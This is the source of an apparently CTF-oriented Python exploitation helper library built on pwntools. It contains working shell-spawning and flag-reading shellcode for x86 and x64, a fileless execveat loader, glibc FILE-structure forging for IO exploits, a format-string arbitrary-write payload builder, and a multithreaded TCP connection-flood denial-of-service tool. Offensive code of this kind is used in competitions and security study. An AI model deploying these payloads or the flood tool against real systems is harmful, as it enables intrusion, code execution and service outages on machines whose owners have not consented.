import collections
import logging
import math
import operator
import os
import re
import requests
import socks
import signal
import string
import struct
import subprocess
import sys
import tempfile
import threading
import time

from pwn import *

from q4nlib.interactive.PWN import ENV
from q4nlib.misc.log import Log
from q4nlib.misc.utf8utils import packutf8, debug_print_mbs
from q4nlib.misc import Latin1_decode,Latin1_encode,color
from q4nlib.misc import q4nctx as ctx
from q4nlib.payload.shellcode import shellcode_readfile32, shellcode_readfile64, shellcode_execve32, shellcode_execve64, shellcode_execveat
from q4nlib.payload.iofile import ioleak, pack_file64, pack_file32
from q4nlib.payload.fmt import fmtpayload
from q4nlib.exploit.tcpdos import dos_attack
from q4nlib.exploit.iplist import iplist
from q4nlib.exploit.changepasswd import changepasswd
from q4nlib.exploit.submitflag import submit

__all__ = [x for x in tuple(globals()) if x != '__name__']


# -*- coding:utf-8 -*-
from pwn import *
from q4nlib.misc import log
from q4nlib.misc import color

from pwnlib.tubes.sock import sock
from pwnlib import gdb
from q4nlib.misc import q4nctx

tube.sd = tube.send
tube.sl = tube.sendline
tube.sa = tube.sendafter
tube.sla = tube.sendlineafter
tube.rv = tube.recv
tube.rn = tube.recvn
tube.ru = tube.recvuntil
tube.rl = tube.recvline
tube.ra = tube.recvall
tube.rr = tube.recvregex
tube.rp = tube.recvrepeat
tube.ia = tube.interactive

def try_log():
    try:
        log.Log("ctx.libc.address",q4nctx.libc.address)       
    except:
        pass   
    try:
        log.Log("ctx.binary.address",q4nctx.binary.address)       
    except:
        pass   
    try:
        log.Log("ctx.code",q4nctx.code)       
    except:
        pass  
    try:        
        log.Log("ctx.heap",q4nctx.heap)       
    except:
        pass
    try:
        log.Log("ctx.stack",q4nctx.stack)       
    except:
        pass

def sock_dbg(self,script = '', sp = 0):
    try_log()
def process_dbg(self, script = '', sp = 0):
    try_log()
    if sp == 0:
        gdb.attach(self, script)
    else:
        with open("/tmp/gdb_script","w") as f:
            f.write(script)
        os.system("gnome-terminal -e \'gdb -p "+ str(self.pid)+" --command=/tmp/gdb_script"+'\'')
        pause()

sock.dbg = sock_dbg
process.dbg = process_dbg

def ENV(cmdline = '' , libpath = '', ldpath = '',log_level='debug'):
    ''' ENV(cmdline = '' , libpath = '', ldpath = '',log_level='debug'):  init local pwn environ
    cmdline: your process 
    libpath: .so path or directory
    ldpath: ld.so path

    return: (packed_cmdline:list, env: dict)
    
    example:
        # context.terminal=['tmux','new-window']
        cmd,environ = ENV('/bin/sh')
        r = process(cmd,env=environ)
    '''
    # default use arch amd64
    context(log_level=log_level,os='linux',arch = "amd64")
    env = dict()

    cmdlist = list()
    if cmdline:
        cmdlist = cmdline.split()
        if '.sh' not in cmdlist[0]:
            q4nctx.binary = ELF(cmdlist[0])
            context.binary = cmdlist[0]

    if libpath:
        if os.path.isdir(libpath):
            env['LD_LIBRARY_PATH'] = libpath
        elif os.path.isfile(libpath):
            env['LD_PRELOAD'] = libpath
            q4nctx.libc = ELF(libpath)
            context.arch = q4nctx.libc.arch
        else:
            raise Exception(color("err `libpath` in ENV",'red'))
    elif q4nctx.binary:
        q4nctx.libc = q4nctx.binary.libc

    if ldpath:
        if os.path.isfile(libpath):
            cmdlist.insert(0,ldpath)
        else:
            raise Exception(color("err `ldpath` in ENV",'red'))
    
    return (cmdlist, env)



from pwn import *

def ioleak(is32=False):
    if is32:
        # 0x11 bytes
        return p32(0xfbad3887)+p32(0)*3+b'\x00'
    else:
        # 0x21 bytes
        return p64(0xfbad3887)+p64(0)*3+b'\x00'

def pack_file32(
        _flags = 0,
        _IO_read_ptr = 0,
        _IO_read_end = 0,
        _IO_read_base = 0,
        _IO_write_base = 0,
        _IO_write_ptr = 0,
        _IO_write_end = 0,
        _IO_buf_base = 0,
        _IO_buf_end = 0,
        _IO_save_base = 0,
        _IO_backup_base = 0,
        _IO_save_end = 0,
        _IO_marker = 0,
        _IO_chain = 0,
        _fileno = 0,
        _lock = 0,
    ):
    file_struct=p32(_flags) + \
                p32(_IO_read_ptr) + \
                p32(_IO_read_end) + \
                p32(_IO_read_base) + \
                p32(_IO_write_base) + \
                p32(_IO_write_ptr) + \
                p32(_IO_write_end) + \
                p32(_IO_buf_base) + \
                p32(_IO_buf_end) + \
                p32(_IO_save_base) + \
                p32(_IO_backup_base) + \
                p32(_IO_buf_end) +\
                p32(_IO_marker)+\
                p32(_IO_chain) + \
                p32(_fileno)
    file_struct=file_struct.ljust(0x48,b'\x00')
    file_struct+=p32(_lock)
    file_struct=file_struct.ljust(0x94,b'\x00')
    return file_struct

def pack_file64(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
            p32(0) + \
            p64(_IO_read_ptr) + \
            p64(_IO_read_end) + \
            p64(_IO_read_base) + \
            p64(_IO_write_base) + \
            p64(_IO_write_ptr) + \
            p64(_IO_write_end) + \
            p64(_IO_buf_base) + \
            p64(_IO_buf_end) + \
            p64(_IO_save_base) + \
            p64(_IO_backup_base) + \
            p64(_IO_save_end) + \
            p64(_IO_marker) + \
            p64(_IO_chain) + \
            p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct


# -*- coding:utf-8 -*-
from pwn import *

def shellcode_execve64():
    code64=""" xor 	rdx,rdx
xor 	rsi,rsi			
push rsi
mov rdi,0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al,0x3b
cdq
syscall
"""
    return asm(code64,arch = "amd64")

def shellcode_execve32():
    code32="""xor ecx,ecx
push 0xb
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
int 0x80
"""
    return asm(code32,arch = "i386")

def shellcode_readfile32(filename ='flag'):
    code = """xor ecx,ecx
mov eax,SYS_open
call here
.string "{}"
.byte 0
here:
pop ebx
int 0x80
mov ebx,eax
mov ecx,esp
mov edx,0x100
mov eax,SYS_read
int 0x80
mov ebx,1
mov ecx,esp
mov edx,0x100
mov eax,SYS_write
int 0x80
mov eax,SYS_exit
int 0x80
""".format(filename)
    return asm(code,arch="i386")

def shellcode_readfile64(filename ='flag'):
    code = """xor rsi,rsi
mov rax,SYS_open
call here
.string "{}"
here:
pop rdi
syscall
mov rdi,rax
mov rsi,rsp
mov rdx,0x100
mov rax,SYS_read
syscall
mov rdi,1
mov rsi,rsp
mov rdx,0x100
mov rax,SYS_write
syscall
mov rax,SYS_exit
syscall
""".format(filename)
    return asm(code,arch="amd64")


def shellcode_execveat():
    # 这个shellcode从文件读取输入,无文件执行从stdin输入到内存的文件
    code=shellcraft.pushstr("Q4n")+"""mov rax,319
mov rdi,rsp
xor rsi,rsi
syscall
mov rbx,rax
loop:
xor rdi,rdi
mov rsi,rsp
mov rdx,0x400
xor rax,rax
syscall
cmp rax,0
je go
mov rdi,rbx
mov rsi,rsp
mov rdx,rax
xor rax,rax
inc rax
syscall
jmp loop
go:
mov rdi,rbx
push 0
mov rsi,rsp
xor rdx,rdx
xor r10,r10
mov r8,0x1000
mov rax,322
syscall
"""
    return asm(code,arch="amd64")


from __future__ import absolute_import

import sys

from q4nlib.misc import log
from q4nlib.misc import utf8utils
from q4nlib.misc import q4nctx

__all__ = ['log','utf8utils','q4nctx']


def Latin1_encode(string): # str -> bytes
    if sys.version_info[0]==3:
        return bytes(string,"Latin1")
    return bytes(string)
def Latin1_decode(string): # bytes -> str
    if sys.version_info[0]==3:
        return str(string,'Latin1')
    return string

def color(content,color='purple'):
    c = {
        "black": 30,
        "red": 31,
        "green": 32,
        "yellow": 33,
        "blue": 34,
        "purple": 35,
        "cyan": 36,
        "white": 37,
    }
    return "\033[1;{}m{}\033[0m".format(c.get(color), content)





from __future__ import absolute_import

from q4nlib.exploit import tcpdos
from q4nlib.exploit import iplist
from q4nlib.exploit import changepasswd
from q4nlib.exploit import submitflag

__all__ = ['tcpdos', 'iplist', 'changepasswd', 'submitflag']



def iplist(ipfilter = ''):
    ''' iplist('125-127-100.100-110.110-120.20-25') --> List '''
    tmp=ipfilter.split('.')
    tmp_list=[]
    result=[]
    for i in tmp:
        if '-' in i:
            tmp1=i.split('-')
            if len(tmp1) == 2:
                tmp_list.append((int(tmp1[0]),int(tmp1[1]),1))
            elif len(tmp1)==3:
                tmp_list.append((int(tmp1[0]),int(tmp1[1]),int(tmp1[2])))
            else:
                print("[-] Error ip_range!")
                exit()
        else:
            tmp_list.append((int(i),int(i)+1,1))
    for a in range(tmp_list[0][0],tmp_list[0][1],tmp_list[0][2]):
        for b in range(tmp_list[1][0],tmp_list[1][1],tmp_list[1][2]):
            for c in range(tmp_list[2][0],tmp_list[2][1],tmp_list[2][2]):
                for d in range(tmp_list[3][0],tmp_list[3][1],tmp_list[3][2]):
                    tmpip=".".join([str(a),str(b),str(c),str(d)])
                    result.append(tmpip)
    return result




# -*- coding: utf-8 -*-
from pwn import *
import struct
from q4nlib.misc import log

# from Crypto.Util.number import *
def b(s):
    return s.encode("latin-1") # utf-8 would cause some side-effects we don't want
def long_to_bytes(n, blocksize=0):
    """long_to_bytes(n:long, blocksize:int) : string
    Convert a long integer to a byte string.

    If optional blocksize is given and greater than zero, pad the front of the
    byte string with binary zeros so that the length is a multiple of
    blocksize.
    """
    # after much testing, this algorithm was deemed to be the fastest
    s = b('')
    n = int(n)
    pack = struct.pack
    while n > 0:
        s = pack('>I', n & 0xffffffff) + s
        n = n >> 32
    # strip off leading zeros
    for i in range(len(s)):
        if s[i] != b('\000')[0]:
            break
    else:
        # only happens when n == 0
        s = b('\000')
        i = 0
    s = s[i:]
    # add back some pad bytes.  this could be done more efficiently w.r.t. the
    # de-padding being done above, but sigh...
    if blocksize > 0 and len(s) % blocksize:
        s = (blocksize - len(s) % blocksize) * b('\000') + s
    return s

def _4to6(raw4):
    t = u32(raw4)
    assert( 0x4000000<= t and t <= 0x7fffffff )
    i = 0b111111001000000010000000100000001000000010000000
    i |= ((t >> 30) & 1) << 40
    i |= ((t >> 24) & 0b111111) << 32
    i |= ((t >> 18) & 0b111111) << 24
    i |= ((t >> 12) & 0b111111) << 16
    i |= ((t >> 6) & 0b111111) << 8
    i |= ((t >> 0) & 0b111111) << 0
    return long_to_bytes(i)
def _3to5(raw):
    t = u32(raw.ljust(4,b'\x00'))
    assert( 0x200000 <= t and t <= 0x3ffffff )
    i = 0b1111100010000000100000001000000010000000
    i |= ((t >> 24) & 0b11) << 32
    i |= ((t >> 18) & 0b111111) << 24
    i |= ((t >> 12) & 0b111111) << 16
    i |= ((t >> 6) & 0b111111) << 8
    i |= ((t >> 0) & 0b111111) << 0
    return long_to_bytes(i)
def _3to4(raw):
    t = u32(raw.ljust(4,b'\x00'))
    assert( 0x10000 <= t and t <= 0x1fffff )
    i = 0b11110000100000001000000010000000
    i |= ((t >> 18) & 0b111) << 24
    i |= ((t >> 12) & 0b111111) << 16
    i |= ((t >> 6) & 0b111111) << 8
    i |= ((t >> 0) & 0b111111) << 0
    return long_to_bytes(i)
def _2to3(raw):
    t = u32(raw.ljust(4,b'\x00'))
    assert( 0x800 <= t and t <= 0xffff )
    i = 0b111000001000000010000000
    i |= ((t >> 12) & 0b1111) << 16
    i |= ((t >> 6) & 0b111111) << 8
    i |= ((t >> 0) & 0b111111) << 0
    return long_to_bytes(i)
def _1to2(raw):
    t = u32(raw.ljust(4,b'\x00'))
    # print(hex(t))
    assert( 0x80 <= t and t <= 0x7ff )
    i = 0b1100000010000000
    i |= ((t >> 6) & 0b11111) << 8
    i |= ((t >> 0) & 0b111111) << 0
    return long_to_bytes(i)
def _1to1(raw):
    t = u32(raw.ljust(4,b'\x00'))
    assert( 0 <= t and t <= 0x7f )
    i = 0b00000000
    i |= ((t >> 0) & 0b1111111) << 0
    return long_to_bytes(i)
def autopack(raw4):
    assert(len(raw4)==4)
    t = u32(raw4)
    if 0 <= t and t <= 0x7f:
        return _1to1(raw4)
    elif 0x80 <= t and t <= 0x7ff:
        return _1to2(raw4)
    elif 0x800 <= t and t <= 0xffff:
        return _2to3(raw4)
    elif 0x10000 <= t and t <= 0x1fffff:
        return _3to4(raw4)
    elif 0x200000 <= t and t <= 0x3ffffff:
        return _3to5(raw4)
    elif 0x4000000<= t and t <= 0x7fffffff:
        return _4to6(raw4)
    else:
        raise Exception("range >= 0x80000000", hex(t))
def packutf8(raw,pad = b'\x00'):
    """ packutf8(raw,pad = b'\x00')
    raw: muti bytes(ascii) -> bytes
    pad: ljust char

    ret: packed bytes(utf8 packed) -> bytes
    """
    result = b''
    for i in range(0,len(raw),4):
        if i+4>len(raw):
            result += autopack(raw[i:].ljust(4,pad))
            break
        result += autopack(raw[i:i+4])
    return result 

def debug_print_mbs(raw):
    ''' debug_print_mbs(raw)
    raw: bytes
    no return
    '''
    result = []
    for i in range(0,len(raw),4):
        if i+4>len(raw):
            result.append(u32(raw[i:].ljust(4,b'\x00')))
            break
        result.append(u32(raw[i:i+4]))
    for i in result:
        if i > 0x7fffffff:
            log.Log.red('[-]',i)
        else:
            log.Log.green('[+]',i)
        
if __name__ == "__main__":
    cd = b'.\xf4\x01\x00z\xf3\x01\x00'
    print(repr(mbs2utf8(cd)))



from pwn import *
from q4nlib.misc import Latin1_decode, Latin1_encode

def fmtpayload(offset,address,value):
    # from @Lewis
    payload = ""
    t = value
    last = 0
    padding=0x60
    for i in range(4):
        payload += "%{}d%{}$hn".format(t % 0x10000 - last + 0x10000, offset+padding/8+i) #t % 0x10000 - last + 0x10000
        last = t % 0x10000
        t = t >> 16
    payload = Latin1_encode(payload).ljust(padding, b"\x00")
    for i in range(4):
        payload += p64(address + i * 2)
    return payload




#!/usr/bin/pypy
import socket
import threading

def __dos_exploit(ip,port):
    print('init success',ip,port)
    while True:
        try:
            s = socket.socket()
            s.connect((ip,port))
        except KeyboardInterrupt:
            s.close()
            exit()
        except socket.error as e:
            pass
        except Exception as e:
            print(e)
            pass
        finally:
            s.close()

def dos_attack(ip='127.0.0.1',port=8889,threadnum=4):
    """ threadnum = 10 # guess cpu?  perhaps 4 threads can also fuck the server >.< """
    pool = []
    for _ in range(threadnum):
        thr = threading.Thread(target = __dos_exploit,args=(ip,port))
        pool.append(thr)
        thr.start()
    
if __name__ == '__main__':
    dos_attack('127.0.0.1',8888,4)